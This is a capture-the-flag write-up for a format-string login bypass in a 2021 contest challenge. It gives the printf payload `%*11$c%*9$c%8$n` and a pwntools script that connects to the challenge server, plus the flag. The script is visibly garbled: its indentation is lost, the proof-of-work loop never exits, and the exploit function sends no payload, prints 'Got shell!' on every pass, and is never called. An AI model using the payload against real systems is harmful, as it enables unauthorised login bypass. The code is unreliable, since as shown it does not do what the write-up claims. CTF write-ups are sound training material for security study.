Tags: printf 

Rating: 5.0

[Link to original writeup](https://wrecktheline.com/writeups/m0lecon-2021/#login2_writeup)
# Yet Another Login (19 solves, 225 points)
by FeDEX

Just another another simple login bypass challenge.

nc challs.m0lecon.it 5556

Author: Alberto247

This challenge is similar to the "Another Login" challenge, the only difference is that the `seed` is cleared from the stack and there is no way we can leak it anymore.
In this case, we need to think of another trick in order to bypass the login. Given that the input size is quite short (19 bytes) wee don't have the comfort to overwrite pointers and corrupt values on the stack as this approach would be too long.
Thus, the technique we can up with is to use `*` trick which would allow us to take the padding length from the stack and when we can write it in the `sum` variable thus bypass all conditions.
So, we just need to send 16 times the following payload: `%*11$c%*9$c%8$n`

from pwn import remote #pip install pwntools
from hashlib import sha256

def solvepow(p, n):
s = p.recvline()
starting = s.split(b'with ')[1][:10].decode()
s1 = s.split(b'in ')[-1][:n]
i = 0
print("Solving PoW...")
while True:
if sha256((starting+str(i)).encode('ascii')).hexdigest()[-n:] == s1.decode():
p.sendline(starting + str(i))
i += 1

def exploit(p):
for i in range(16):
print("Got shell!")

if __name__ == '__main__':
p = remote('challs.m0lecon.it', 5556)
solvepow(p, n = 5)

- flag: `ptm{N0w_th1s_1s_th3_r34l_s3rv3r!}`

Original writeup (https://wrecktheline.com/writeups/m0lecon-2021/#login2_writeup).